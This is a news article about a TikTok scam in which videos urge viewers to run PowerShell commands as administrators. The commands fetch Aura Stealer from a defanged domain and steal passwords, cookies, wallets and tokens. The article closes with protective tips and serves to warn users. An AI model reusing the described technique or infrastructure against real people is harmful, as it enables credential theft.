Cybercriminals Target TikTok Users with Malware Disguised as Free Software

Cybercriminals are exploiting TikTok to deceive users into downloading malware disguised as free activation guides for popular software. This scam involves fake videos that claim to offer solutions for activating programs such as Windows, Microsoft 365, and even streaming services like Netflix and Spotify Premium. Security expert Xavier Mertens first identified this campaign, noting similarities to a similar scheme detected earlier this year.

According to a report from BleepingComputer, these fraudulent TikTok videos feature short PowerShell commands, instructing viewers to run them as administrators. While the videos promise to “activate” or “fix” software, they actually connect to malicious websites that distribute malware known as Aura Stealer. This malware surreptitiously gathers saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s device.

Understanding the Scam

The current TikTok campaign employs a technique known as a ClickFix attack, a form of social engineering that misleads victims into believing they are following legitimate technical instructions. The process appears straightforward: run a simple command to gain instant access to premium software. However, the PowerShell commands actually link to a remote domain, slmgr[.]win, which downloads malicious executables hosted on Cloudflare.

The primary file involved in this attack, updater.exe, is a variant of Aura Stealer. Once executed, it searches for user credentials and sends the collected data back to the attackers. A second file, source.exe, utilizes Microsoft’s C# compiler to execute code directly in memory, making detection challenging. While the exact purpose of this second payload remains unclear, it follows patterns observed in previous malware designed for cryptocurrency theft and ransomware dissemination.

Protecting Yourself Against TikTok Malware

Despite the convincing appearance of these scams, users can take specific steps to safeguard their devices and personal information. Here are some effective precautions:

1. **Avoid Shortcuts**: Refrain from copying or executing PowerShell commands from TikTok videos or unfamiliar websites. If a source promises free access to premium software, it is likely a trap.

2. **Use Trusted Sources**: Always download software directly from official websites or verified app stores.

3. **Keep Security Tools Updated**: Regularly update antivirus software and browsers to ensure they can detect the latest threats. Outdated security measures may leave systems vulnerable.

4. **Install Strong Antivirus Software**: Robust antivirus programs offer real-time scanning and protection against trojans, information stealers, and phishing attempts. This is essential for detecting malicious links and safeguarding personal data.

5. **Consider a Data Removal Service**: If your personal information is compromised, a data removal or monitoring service can alert you and assist in removing sensitive data from the internet. While no service can guarantee complete removal, these services actively monitor and erase personal information from various sites.

6. **Reset Credentials**: If you have followed dubious instructions or entered credentials after viewing a “free activation” video, immediately reset your passwords, starting with your email, financial, and social media accounts.

7. **Enable Multi-Factor Authentication**: Adding this extra layer of security can prevent unauthorized access, even if passwords are compromised.

The allure of free software can be tempting, but users must remain vigilant. Scams on platforms like TikTok highlight the importance of trusting verified sources and recognizing the risks associated with shortcuts. As Xavier Mertens warns, what may appear to be a helpful hack can jeopardize both security and personal peace of mind.